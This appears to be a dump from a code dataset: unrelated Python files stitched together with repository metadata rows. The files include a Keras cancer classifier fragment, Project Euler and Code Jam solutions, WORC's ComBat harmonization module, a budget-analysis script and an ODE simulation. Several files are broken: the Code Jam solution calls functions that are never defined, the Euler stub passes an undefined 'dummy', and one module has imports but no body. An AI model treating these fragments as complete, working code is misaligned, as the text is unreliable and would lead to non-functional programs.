detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform',input_dim=30))
#Adicionando uma camada oculta
detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform'))
# Adicionando camada de saida
detectar_cancer.add(Dense(units=1,activation='sigmoid'))
# Compilar a rede
#compile(descida_gradiente,funo do erro- MSE, preciso da rede)
# clipvalue -> delimita os valores dos pesos entre 0.5 e -0.5
# lr = tamanho do passo, decay-> reduo do passo
otimizar = keras.optimizers.Adam(lr=0.001,decay=0.0001)
# Nesse caso o clipvalue prejudicou
#otimizar = keras.optimizers.Adam(lr=0.004,decay=0.0001,clipvalue=0.5)
detectar_cancer.compile(otimizar,loss='binary_crossentropy',metrics=['binary_accuracy'])
#detectar_cancer.compile(optimizer='adam',loss='binary_crossentropy',metrics=['binary_accuracy'])
# Fazer o treinamento da rede - erro calculado para 10 amostras
#depois atualiza os pesos -descida do gradiente estocasticos de 10 em 10 amostras
detectar_cancer.fit(entrada_treinar,esperado_treinar,batch_size=10,epochs=100)
# Pegando os pesos
pesosCamadaEntrada = detectar_cancer.layers[0].get_weights()
pesosCamadaOculta = detectar_cancer.layers[1].get_weights()
pesosCamadaSaida = detectar_cancer.layers[2].get_weights()
# Realizando teste de validao
# retorna probabilidade de acerto
validar = detectar_cancer.predict(entrada_teste)
# convertendo para true ou false (1 ou 0) para comparar
# se for maior que 0.5 true, caso contrrio false
validar = (validar > 0.5)
# compara os 2 vetores e calcula a porcentagem de acerto
# da rede usando o conjunto de treinamento
precisao = accuracy_score(esperado_teste,validar)
# Matriz de acertos da rede
acertos = confusion_matrix(esperado_teste,validar)
# Outra maneira de resultado
# retorna o erro e a preciso
resultado = detectar_cancer.evaluate(entrada_teste, esperado_teste)
| 33.216867 | 114 | 0.791077 |
5f50dd9219cff3c1253c4849dd5381638d312cc3 | 1,214 | py | Python | py/py_0736_paths_to_equality.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0736_paths_to_equality.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0736_paths_to_equality.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | # Solution of;
# Project Euler Problem 736: Paths to Equality
# https://projecteuler.net/problem=736
#
# Define two functions on lattice points:$r(x,y) = (x+1,2y)$$s(x,y) =
# (2x,y+1)$A path to equality of length $n$ for a pair $(a,b)$ is a sequence
# $\Big((a_1,b_1),(a_2,b_2),\ldots,(a_n,b_n)\Big)$, where:$(a_1,b_1) =
# (a,b)$$(a_k,b_k) = r(a_{k-1},b_{k-1})$ or $(a_k,b_k) = s(a_{k-1},b_{k-1})$
# for $k > 1$$a_k \ne b_k$ for $k < n$$a_n = b_n$$a_n = b_n$ is called the
# final value. For example,$(45,90)\xrightarrow{r}
# (46,180)\xrightarrow{s}(92,181)\xrightarrow{s}(184,182)\xrightarrow{s}(368,183)\xrightarrow{s}(736,184)\xrightarrow{r}$$(737,368)\xrightarrow{s}(1474,369)\xrightarrow{r}(1475,738)\xrightarrow{r}(1476,1476)$This
# is a path to equality for $(45,90)$ and is of length 10 with final value
# 1476. There is no path to equality of $(45,90)$ with smaller length. Find
# the unique path to equality for $(45,90)$ with smallest odd length. Enter
# the final value as your answer.
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 736
timed.caller(dummy, n, i, prob_id)
| 40.466667 | 213 | 0.651565 |
5f548523f9dcf1f62a0e2fe0f345f22d699939d1 | 1,728 | py | Python | codejam/2020-qualification/d.py | Ashindustry007/competitive-programming | 2eabd3975c029d235abb7854569593d334acae2f | [
"WTFPL"
] | 506 | 2018-08-22T10:30:38.000Z | 2022-03-31T10:01:49.000Z | codejam/2020-qualification/d.py | Ashindustry007/competitive-programming | 2eabd3975c029d235abb7854569593d334acae2f | [
"WTFPL"
] | 13 | 2019-08-07T18:31:18.000Z | 2020-12-15T21:54:41.000Z | codejam/2020-qualification/d.py | Ashindustry007/competitive-programming | 2eabd3975c029d235abb7854569593d334acae2f | [
"WTFPL"
] | 234 | 2018-08-06T17:11:41.000Z | 2022-03-26T10:56:42.000Z | #!/usr/bin/env python3
# https://codingcompetitions.withgoogle.com/codejam/round/000000000019fd27/0000000000209a9e
t, b = map(int, input().split())
for _ in range(t):
xs = [None] * b
q, k, k1, k2 = 0, 0, None, None
while True:
if q > 0 and q % 10 == 0:
if k1 is not None and k2 is not None:
v1 = query(k1+1)
v2 = query(k2+1)
if xs[k1] == v1 and xs[k2] == v2:
pass
elif xs[k1] != v1 and xs[k2] != v2:
complement()
elif xs[k1] != v1:
xs = xs[::-1]
complement()
else:
xs = xs[::-1]
elif k1 is not None:
v1 = query(k1+1)
v1 = query(k1+1)
if xs[k1] != v1:
complement()
else:
v2 = query(k2+1)
v2 = query(k2+1)
if xs[k2] != v2:
xs = xs[::-1]
else:
v1 = query(k+1)
v2 = query(b-k)
xs[k] = v1
xs[b-k-1] = v2
if v1 == v2 and k1 is None:
k1 = k
elif v1 != v2 and k2 is None:
k2 = k
k += 1
if k*2 == b:
solve()
break
| 27 | 91 | 0.358218 |
5f587bf36e711ee18aa81e26269a6338ac9328eb | 1,388 | py | Python | Stephanie/updater.py | JeremyARussell/stephanie-va | acc894fa69b4e5559308067d525f71f951ecc258 | [
"MIT"
] | 866 | 2017-06-10T19:25:28.000Z | 2022-01-06T18:29:36.000Z | Stephanie/updater.py | JeremyARussell/stephanie-va | acc894fa69b4e5559308067d525f71f951ecc258 | [
"MIT"
] | 54 | 2017-06-11T06:41:19.000Z | 2022-01-10T23:06:03.000Z | Stephanie/updater.py | JeremyARussell/stephanie-va | acc894fa69b4e5559308067d525f71f951ecc258 | [
"MIT"
] | 167 | 2017-06-10T19:32:54.000Z | 2022-01-03T07:01:39.000Z | import requests
from Stephanie.configurer import config
| 34.7 | 142 | 0.730548 |
5f591fe59a581e7f936f818cedb0f094b131b698 | 24,533 | py | Python | WORC/featureprocessing/ComBat.py | MStarmans91/WORC | b6b8fc2ccb7d443a69b5ca20b1d6efb65b3f0fc7 | [
"ECL-2.0",
"Apache-2.0"
] | 47 | 2018-01-28T14:08:15.000Z | 2022-03-24T16:10:07.000Z | WORC/featureprocessing/ComBat.py | JZK00/WORC | 14e8099835eccb35d49b52b97c0be64ecca3809c | [
"ECL-2.0",
"Apache-2.0"
] | 13 | 2018-08-28T13:32:57.000Z | 2020-10-26T16:35:59.000Z | WORC/featureprocessing/ComBat.py | JZK00/WORC | 14e8099835eccb35d49b52b97c0be64ecca3809c | [
"ECL-2.0",
"Apache-2.0"
] | 16 | 2017-11-13T10:53:36.000Z | 2022-03-18T17:02:04.000Z | #!/usr/bin/env python
# Copyright 2020 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import scipy.io as sio
import WORC.IOparser.file_io as wio
import WORC.IOparser.config_io_combat as cio
import numpy as np
import random
import pandas as pd
from WORC.addexceptions import WORCValueError, WORCKeyError
import tempfile
from sys import platform
from WORC.featureprocessing.VarianceThreshold import selfeat_variance
from sklearn.preprocessing import StandardScaler
from neuroCombat import neuroCombat
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from WORC.featureprocessing.Imputer import Imputer
def ComBat(features_train_in, labels_train, config, features_train_out,
features_test_in=None, labels_test=None, features_test_out=None,
VarianceThreshold=True, scaler=False, logarithmic=False):
"""
Apply ComBat feature harmonization.
Based on: https://github.com/Jfortin1/ComBatHarmonization
"""
# Load the config
print('############################################################')
print('# Initializing ComBat. #')
print('############################################################\n')
config = cio.load_config(config)
excluded_features = config['ComBat']['excluded_features']
# If mod, than also load moderating labels
if config['ComBat']['mod'][0] == '[]':
label_names = config['ComBat']['batch']
else:
label_names = config['ComBat']['batch'] + config['ComBat']['mod']
# Load the features for both training and testing, match with batch and mod parameters
label_data_train, image_features_train =\
wio.load_features(features_train_in, patientinfo=labels_train,
label_type=label_names)
feature_labels = image_features_train[0][1]
image_features_train = [i[0] for i in image_features_train]
label_data_train['patient_IDs'] = list(label_data_train['patient_IDs'])
# Exclude features
if excluded_features:
print(f'\t Excluding features containing: {excluded_features}')
# Determine indices of excluded features
included_feature_indices = []
excluded_feature_indices = []
for fnum, i in enumerate(feature_labels):
if not any(e in i for e in excluded_features):
included_feature_indices.append(fnum)
else:
excluded_feature_indices.append(fnum)
# Actually exclude the features
image_features_train_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_train]
feature_labels_combat = np.asarray(feature_labels)[included_feature_indices].tolist()
image_features_train_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_train]
feature_labels_noncombat = np.asarray(feature_labels)[excluded_feature_indices].tolist()
else:
image_features_train_combat = image_features_train
feature_labels_combat = feature_labels.tolist()
image_features_train_noncombat = []
feature_labels_noncombat = []
# Detect NaNs, otherwise first feature imputation is required
if any(np.isnan(a) for a in np.asarray(image_features_train_combat).flatten()):
print('\t [WARNING] NaNs detected, applying median imputation')
imputer = Imputer(missing_values=np.nan, strategy='median')
imputer.fit(image_features_train_combat)
image_features_train_combat = imputer.transform(image_features_train_combat)
else:
imputer = None
# Apply a scaler to the features
if scaler:
print('\t Fitting scaler on dataset.')
scaler = StandardScaler().fit(image_features_train_combat)
image_features_train_combat = scaler.transform(image_features_train_combat)
# Remove features with a constant value
if VarianceThreshold:
print(f'\t Applying variance threshold on dataset.')
image_features_train_combat, feature_labels_combat, VarSel =\
selfeat_variance(image_features_train_combat, np.asarray([feature_labels_combat]))
feature_labels_combat = feature_labels_combat[0].tolist()
if features_test_in:
label_data_test, image_features_test =\
wio.load_features(features_test_in, patientinfo=labels_test,
label_type=label_names)
image_features_test = [i[0] for i in image_features_test]
label_data_test['patient_IDs'] = list(label_data_test['patient_IDs'])
if excluded_features:
image_features_test_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_test]
image_features_test_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_test]
else:
image_features_test_combat = image_features_test
image_features_test_noncombat = []
# Apply imputation if required
if imputer is not None:
image_features_test_combat = imputer.transform(image_features_test_combat)
# Apply a scaler to the features
if scaler:
image_features_test_combat = scaler.transform(image_features_test_combat)
# Remove features with a constant value
if VarianceThreshold:
image_features_test_combat = VarSel.transform(image_features_test_combat)
all_features = image_features_train_combat.tolist() + image_features_test_combat.tolist()
all_labels = list()
for i in range(label_data_train['label'].shape[0]):
all_labels.append(label_data_train['label'][i, :, 0].tolist() + label_data_test['label'][i, :, 0].tolist())
all_labels = np.asarray(all_labels)
else:
all_features = image_features_train_combat.tolist()
all_labels = label_data_train['label']
# Convert data to a single array
all_features_matrix = np.asarray(all_features)
all_labels = np.squeeze(all_labels)
# Apply logarithm if required
if logarithmic:
print('\t Taking log10 of features before applying ComBat.')
all_features_matrix = np.log10(all_features_matrix)
# Convert all_labels to dictionary
if len(all_labels.shape) == 1:
# No mod variables
all_labels = {label_data_train['label_name'][0]: all_labels}
else:
all_labels = {k: v for k, v in zip(label_data_train['label_name'], all_labels)}
# Split labels in batch and moderation labels
bat = config['ComBat']['batch']
mod = config['ComBat']['mod']
print(f'\t Using batch variable {bat}, mod variables {mod}.')
batch = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['batch']]
batch = batch[0]
if config['ComBat']['mod'][0] == '[]':
mod = None
else:
mod = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['mod']]
# Set parameters for output files
parameters = {'batch': config['ComBat']['batch'],
'mod': config['ComBat']['mod'],
'par': config['ComBat']['par']}
name = 'Image features: ComBat corrected'
panda_labels = ['parameters',
'patient',
'feature_values',
'feature_labels']
feature_labels = feature_labels_combat + feature_labels_noncombat
# Convert all inputs to arrays with right shape
all_features_matrix = np.transpose(all_features_matrix)
if mod is not None:
mod = np.transpose(np.asarray(mod))
# Patients identified with batch -1.0 should be skipped
skipname = 'Image features: ComBat skipped'
ntrain = len(image_features_train_combat)
ndel = 0
print(features_test_out)
for bnum, b in enumerate(batch):
bnum -= ndel
if b == -1.0:
if bnum < ntrain - ndel:
# Training patient
print('train')
pid = label_data_train['patient_IDs'][bnum]
out = features_train_out[bnum]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_train_noncombat[bnum])
# Delete patient for later processing
del label_data_train['patient_IDs'][bnum]
del image_features_train_noncombat[bnum]
del features_train_out[bnum]
image_features_train_combat = np.delete(image_features_train_combat, bnum, 0)
else:
# Test patient
print('test')
pid = label_data_test['patient_IDs'][bnum - ntrain]
out = features_test_out[bnum - ntrain]
# Combine ComBat and non-ComBat features
feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_test_noncombat[bnum - ntrain])
# Delete patient for later processing
del label_data_test['patient_IDs'][bnum - ntrain]
del image_features_test_noncombat[bnum - ntrain]
del features_test_out[bnum - ntrain]
image_features_test_combat = np.delete(image_features_test_combat, bnum - ntrain, 0)
# Delete some other variables for later processing
all_features_matrix = np.delete(all_features_matrix, bnum, 1)
if mod is not None:
mod = np.delete(mod, bnum, 0)
batch = np.delete(batch, bnum, 0)
# Notify user
print(f'[WARNING] Skipping patient {pid} as batch variable is -1.0.')
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=skipname
)
print(f'\t Saving image features to: {out}.')
panda_data.to_hdf(out, 'image_features')
ndel += 1
print(features_test_out)
# Run ComBat in Matlab
if config['ComBat']['language'] == 'matlab':
print('\t Executing ComBat through Matlab')
data_harmonized = ComBatMatlab(dat=all_features_matrix,
batch=batch,
command=config['ComBat']['matlab'],
mod=mod,
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
elif config['ComBat']['language'] == 'python':
print('\t Executing ComBat through neuroComBat in Python')
data_harmonized = ComBatPython(dat=all_features_matrix,
batch=batch,
mod=mod,
eb=config['ComBat']['eb'],
par=config['ComBat']['par'],
per_feature=config['ComBat']['per_feature'])
else:
raise WORCKeyError(f"Language {config['ComBat']['language']} unknown.")
# Convert values back if logarithm was used
if logarithmic:
data_harmonized = 10 ** data_harmonized
# Convert again to train hdf5 files
feature_values_train_combat = [data_harmonized[:, i] for i in range(len(image_features_train_combat))]
for fnum, i_feat in enumerate(feature_values_train_combat):
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_train_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_train['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_train_out[fnum]}.')
panda_data.to_hdf(features_train_out[fnum], 'image_features')
# Repeat for testing if required
if features_test_in:
print(len(image_features_test_combat))
print(data_harmonized.shape[1])
feature_values_test_combat = [data_harmonized[:, i] for i in range(data_harmonized.shape[1] - len(image_features_test_combat), data_harmonized.shape[1])]
for fnum, i_feat in enumerate(feature_values_test_combat):
print(fnum)
# Combine ComBat and non-ComBat features
feature_values_temp = i_feat.tolist() + image_features_test_noncombat[fnum]
# Sort based on feature label
feature_labels_temp, feature_values_temp =\
zip(*sorted(zip(feature_labels, feature_values_temp)))
# Convert to pandas Series and save as hdf5
pid = label_data_test['patient_IDs'][fnum]
panda_data = pd.Series([parameters, pid, feature_values_temp,
feature_labels_temp],
index=panda_labels,
name=name
)
print(f'Saving image features to: {features_test_out[fnum]}.')
panda_data.to_hdf(features_test_out[fnum], 'image_features')
def ComBatPython(dat, batch, mod=None, par=1,
eb=1, per_feature=False, plotting=False):
"""
Run the ComBat Function python script.
par = 0 is non-parametric.
"""
# convert inputs to neuroCombat format.
covars = dict()
categorical_cols = list()
covars['batch'] = batch
if mod is not None:
for i_mod in range(mod.shape[1]):
label = f'mod_{i_mod}'
covars[label] = [m for m in mod[:, i_mod]]
categorical_cols.append(label)
covars = pd.DataFrame(covars)
batch_col = 'batch'
if par == 0:
parametric = False
elif par == 1:
parametric = True
else:
raise WORCValueError(f'Par should be 0 or 1, now {par}.')
if eb == 0:
eb = False
elif eb == 1:
eb = True
else:
raise WORCValueError(f'eb should be 0 or 1, now {eb}.')
if per_feature == 0:
per_feature = False
elif per_feature == 1:
per_feature = True
else:
raise WORCValueError(f'per_feature should be 0 or 1, now {per_feature}.')
# execute ComBat
if not per_feature:
data_harmonized = neuroCombat(dat=dat, covars=covars, batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
elif per_feature:
print('\t Executing ComBat per feature.')
data_harmonized = np.zeros(dat.shape)
# Shape: (features, samples)
for i in range(dat.shape[0]):
if eb:
# Copy feature + random noise
random_feature = np.random.rand(dat[i, :].shape[0])
feat_temp = np.asarray([dat[i, :], dat[i, :] + random_feature])
else:
# Just use the single feature
feat_temp = np.asarray([dat[i, :]])
feat_temp = neuroCombat(dat=feat_temp, covars=covars,
batch_col=batch_col,
categorical_cols=categorical_cols,
eb=eb, parametric=parametric)
data_harmonized[i, :] = feat_temp[0, :]
if plotting:
feat1 = dat[i, :]
feat1_harm = data_harmonized[i, :]
print(len(feat1))
feat1_b1 = [f for f, b in zip(feat1, batch[0]) if b == 1.0]
feat1_b2 = [f for f, b in zip(feat1, batch[0]) if b == 2.0]
print(len(feat1_b1))
print(len(feat1_b2))
feat1_harm_b1 = [f for f, b in zip(feat1_harm, batch[0]) if b == 1.0]
feat1_harm_b2 = [f for f, b in zip(feat1_harm, batch[0]) if b == 2.0]
plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((len(feat1_b1))), feat1_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_b2, color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((len(feat1_b1))), feat1_harm_b1, color='red')
ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_harm_b2, color='blue')
plt.title('After Combat')
plt.show()
else:
raise WORCValueError(f'per_feature should be False or True, now {per_feature}.')
return data_harmonized
def Synthetictest(n_patients=50, n_features=10, par=1, eb=1,
per_feature=False, difscale=False, logarithmic=False,
oddpatient=True, oddfeat=True, samefeat=True):
"""Test for ComBat with Synthetic data."""
features = np.zeros((n_features, n_patients))
batch = list()
# First batch: Gaussian with loc 0, scale 1
for i in range(0, int(n_patients/2)):
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features)]
if i == 1 and oddpatient:
feat_temp = [np.random.normal(loc=10.0, scale=1.0) for i in range(n_features)]
elif oddfeat:
feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(1)
# Get directions for features
directions = list()
for i in range(n_features):
direction = random.random()
if direction > 0.5:
directions.append(1.0)
else:
directions.append(-1.0)
# First batch: Gaussian with loc 5, scale 1
for i in range(int(n_patients/2), n_patients):
feat_temp = [np.random.normal(loc=direction*5.0, scale=1.0) for i in range(n_features)]
if oddfeat:
feat_temp = [np.random.normal(loc=5.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)]
if difscale:
feat_temp = [f + 1000 for f in feat_temp]
feat_temp = np.multiply(feat_temp, directions)
if samefeat:
feat_temp[-1] = 1
features[:, i] = feat_temp
batch.append(2)
# Create mod var
mod = [[np.random.randint(30, 100) for i in range(n_patients)]]
# Apply ComBat
batch = np.asarray([batch])
mod = np.transpose(np.asarray(mod))
if logarithmic:
minfeat = np.min(features)
features = np.log10(features + np.abs(minfeat) + 1E-100)
data_harmonized = ComBatPython(dat=features, batch=batch, mod=mod, par=par,
eb=eb, per_feature=per_feature)
if logarithmic:
data_harmonized = 10 ** data_harmonized - np.abs(minfeat)
for i in range(n_features):
f = plt.figure()
ax = plt.subplot(2, 1, 1)
ax.scatter(np.ones((int(n_patients/2))), features[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, features[i, int(n_patients/2):], color='blue')
plt.title('Before Combat')
ax = plt.subplot(2, 1, 2)
ax.scatter(np.ones((int(n_patients/2))), data_harmonized[i, 0:int(n_patients/2)], color='red')
ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, data_harmonized[i, int(n_patients/2):], color='blue')
plt.title('After Combat')
plt.show()
f.savefig(f'combat_par{par}_eb{eb}_perfeat{per_feature}_feat{i}.png')
# Logarithmic: not useful, as we have negative numbers, and (almost) zeros.
# so combat gives unuseful results.
# Same feature twice with eb and par: nans
def ComBatMatlab(dat, batch, command, mod=None, par=1, per_feature='true'):
"""
Run the ComBat Function Matlab script.
par = 0 is non-parametric.
"""
# Mod: default argument is empty list
if mod is None:
mod = []
# TODO: Add check whether matlab executable is found
# Save the features in a .mat MatLab Compatible format
# NOTE: Should change this_folder to a proper temporary directory
this_folder = os.path.dirname(os.path.realpath(__file__))
tempdir = tempfile.gettempdir()
tempfile_in = os.path.join(tempdir, 'combat_input.mat')
tempfile_out = os.path.join(tempdir, 'combat_output.mat')
ComBatFolder = os.path.join(os.path.dirname(this_folder),
'external',
'ComBatHarmonization',
'Matlab',
'scripts')
dict = {'output': tempfile_out,
'ComBatFolder': ComBatFolder,
'datvar': dat,
'batchvar': batch,
'modvar': mod,
'parvar': par,
'per_feature': per_feature
}
sio.savemat(tempfile_in, dict)
# Make sure there is no tempfile out from the previous run
if os.path.exists(tempfile_out):
os.remove(tempfile_out)
# Run ComBat
currentdir = os.getcwd()
if platform == "linux" or platform == "linux2":
commandseparator = ' ; '
elif platform == "win32":
commandseparator = ' & '
# BIGR Cluster: /cm/shared/apps/matlab/R2015b/bin/matlab
regcommand = ('cd "' + this_folder + '"' + commandseparator +
'"' + command + '" -nodesktop -nosplash -nojvm -r "combatmatlab(' + "'" + str(tempfile_in) + "'" + ')"' +
commandseparator +
'cd "' + currentdir + '"')
print(f'Executing ComBat in Matlab through command: {regcommand}.')
proc = subprocess.Popen(regcommand,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
proc.wait()
stdout_value, stderr_value = proc.communicate()
# BUG: Waiting does not work, just wait for output to arrive, either with
# the actual output or an error message
succes = False
while succes is False:
if os.path.exists(tempfile_out):
try:
mat_dict = sio.loadmat(tempfile_out)
try:
data_harmonized = mat_dict['data_harmonized']
succes = True
except KeyError:
try:
message = mat_dict['message']
raise WORCValueError(f'Error in Matlab ComBat execution: {message}.')
except KeyError:
pass
except (sio.matlab.miobase.MatReadError, ValueError):
pass
# Check if expected output file exists
if not os.path.exists(tempfile_out):
raise WORCValueError(f'Error in Matlab ComBat execution: command: {regcommand}, stdout: {stdout_value}, stderr: {stderr_value}')
# Read the output from ComBat
mat_dict = sio.loadmat(tempfile_out)
data_harmonized = mat_dict['data_harmonized']
data_harmonized = np.transpose(data_harmonized)
# Remove temporary files
os.remove(tempfile_out)
os.remove(tempfile_in)
return data_harmonized
| 40.684909 | 161 | 0.604329 |
5f59e320e469d3924b3247fe49f94eea11acee62 | 727 | py | Python | setup.py | mariocesar/pg-worker | d79c6daa8825226c754330c21150e4e416b09005 | [
"MIT"
] | 1 | 2020-06-03T21:21:03.000Z | 2020-06-03T21:21:03.000Z | setup.py | mariocesar/pg-worker | d79c6daa8825226c754330c21150e4e416b09005 | [
"MIT"
] | null | null | null | setup.py | mariocesar/pg-worker | d79c6daa8825226c754330c21150e4e416b09005 | [
"MIT"
] | null | null | null | import os
import sys
from setuptools import setup, find_packages
ROOT = os.path.realpath(os.path.join(os.path.dirname(
sys.modules['__main__'].__file__)))
sys.path.insert(0, os.path.join(ROOT, 'src'))
setup(
name='pgworker',
packages=find_packages('src'),
package_dir={'': 'src'},
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
entry_points={
'console_scripts': [
'pgworker = pgworker.runner:main'
]
}
)
| 24.233333 | 53 | 0.603851 |
5f5a0eafce7a5f076591e84cd9440a10e1d4e795 | 2,040 | py | Python | PyBank/main.py | gentikosumi/python-challenge | e6532bf1033f5272616d4f8a1cf623bbafe1a1c2 | [
"ADSL"
] | null | null | null | PyBank/main.py | gentikosumi/python-challenge | e6532bf1033f5272616d4f8a1cf623bbafe1a1c2 | [
"ADSL"
] | null | null | null | PyBank/main.py | gentikosumi/python-challenge | e6532bf1033f5272616d4f8a1cf623bbafe1a1c2 | [
"ADSL"
] | null | null | null | import os
import csv
path = '/Users/kevinkosumi12345/Genti/python-challenge/PyBank/Resources/budget_data.csv'
budget_csv=os.path.join("../Resources", "budget_data.csv")
csvfile = open(path, newline="")
reader=csv.reader(csvfile, delimiter=",")
header = next(reader)
# print(header)
# the columns we have to convert into lists
# Create first 2 empty lists according 2 columns
date = []
profloss = []
# print("Financial Anaysis")
# print("-----------------------------------------")
for row in reader:
date.append(row[0])
profloss.append(int(row[1]))
# getting the total of Profit/Losses
total_profloss='Total Profit/Losses: $ ' + str(sum(profloss))
# print(total_profloss)
# getting the number of months in entire period
monthcount = 'Total months: ' + str(len(date))
# print(monthcount)
# before finding the averadge of change in Profit/Losses, first we have to find the total change
Total_change_profloss = 0
for x in range(1, len(profloss)):
Total_change_profloss = Total_change_profloss + (profloss[x] - profloss[x-1])
# finding the averidge of change in Profit/Losses
avg_change_profloss = 'Averidge change in Profit/Loss: ' + str(round(Total_change_profloss/(len(profloss)-1),2))
# print(avg_change_profloss)
# getting the max value of data in Profit/Losses which is the Greatest Increase of Profit/Losses
maxVal = 'Greatest increase of Profit/Losses: ' + ' on ' + str(date[profloss.index(max(profloss))]) + ' $ ' + str(max(profloss))
# print(maxVal)
# the min Value of date in Profit/Losses which is the Greatest Decrease
minVal = 'Greatest decrease of Profit/Losses: ' + ' on ' + str(date[profloss.index(min(profloss))]) + ' $ ' + str(min(profloss))
# print(minVal)
DataBudget = open('analisis.csv' , 'w')
DataBudget.write('Financial Analysus\n')
DataBudget.write('------------------------\n')
DataBudget.write(monthcount + '\n')
DataBudget.write(total_profloss + '\n')
DataBudget.write(avg_change_profloss + '\n')
DataBudget.write(maxVal + '\n')
DataBudget.write(minVal + '\n')
DataBudget.close | 30.909091 | 129 | 0.702451 |
5f5b2c35892025ff370debbb01a9bff69a798ad0 | 1,516 | py | Python | models/python/hypothalamus/dynamical/old/simple.py | ABRG-Models/MammalBot | 0b153232b94197c7a65156c1c3451ab2b9f725ae | [
"MIT"
] | null | null | null | models/python/hypothalamus/dynamical/old/simple.py | ABRG-Models/MammalBot | 0b153232b94197c7a65156c1c3451ab2b9f725ae | [
"MIT"
] | null | null | null | models/python/hypothalamus/dynamical/old/simple.py | ABRG-Models/MammalBot | 0b153232b94197c7a65156c1c3451ab2b9f725ae | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
T = 30000
# v = 0.02906
# v = 0.617085
v = 0.99
h = 0.01
a = 0.5
b = 0.5
epsilon = 0.05
c = 0.4
eta = lambda rho: np.exp(-(rho)**2/(2*c**2))
nrho = lambda rho, v: -2.0*(rho**3 + (rho-1.0)*v/2.0 - rho)/(rho + 1.0)
nu = lambda rho: (b - eta(rho+1))/a
u = np.zeros(T)
rho = np.zeros(T)
time = np.zeros(T)
# Maps
f = lambda rho, u, v: -rho**3 - (rho + 1.0)*u/2.0 - (rho - 1.0)*v/2.0 + rho
g1 = lambda rho, u, v: epsilon*(b - a*u - eta(rho+1))
# Initial conditions
u[0] = 0.0
rho[0] = -0.0
for i in range(T-1):
rho[i+1] = rho[i] + h*f(rho[i], u[i], v)
u[i+1] = u[i] + h*g1(rho[i], u[i], v)
time[i+1] = time[i] + h
fig, ax = plt.subplots(1, 2)
# X, Y = np.meshgrid(np.arange(-0.6, 0.6, 0.1), np.arange(-0.2, 1.0, .1))
# U = f(X, Y, v)/epsilon #rho
# V = g1(X, Y, v)/epsilon #u
# q = ax[0].quiver(X, Y, U, V, units='x', pivot='tip')#, width=0.022, scale=1 / 0.40)
rhos = np.linspace(-0.99, 1, 100)
ax[0].plot( rhos, nrho(rhos, v), color = [0.8, 0.5, 0.5], linewidth = 3.0)
ax[0].plot( rhos, nu(rhos), color = [0.5, 0.5, 0.8], linewidth = 3.0)
ax[0].plot( rho[0], u[0], 'k.', linewidth = 3.0)
ax[0].plot( rho, u, 'k' )
ax[0].plot( [-1, -1], [-1.5, 1.5], 'k--')
ax[0].set_ylabel('u')
ax[0].set_xlabel(r'$\rho$')
ax[0].text(0.5, nu(0.5)+0.05, r'$u_0$')
ax[0].text(0.95, nrho(0.9, v), r'$\rho_0$')
ax[0].axis([-2, 2, -1.0, 1.5])
ax[1].plot( time, u, label = 'u')
ax[1].plot( time, rho, label = r'$\rho$' )
ax[1].legend()
ax[1].set_xlabel('time')
plt.show() | 28.603774 | 85 | 0.529024 |
